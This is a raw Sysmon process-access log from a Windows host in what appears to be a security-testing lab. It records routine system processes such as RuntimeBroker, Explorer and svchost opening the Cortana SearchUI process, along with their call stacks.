09:19:00.787{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001052049Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.787{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001052048Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.787{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052047Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.787{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.771{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001052045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.771{5EBD8912-79BF-6151-DA77-00000000FC01}21522248C:\Windows\System32\RuntimeBroker.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001052044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.771{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001052043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.771{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001052042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.756{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.756{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F30-614D-0D00-00000000FC01}8885896C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:00.740{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 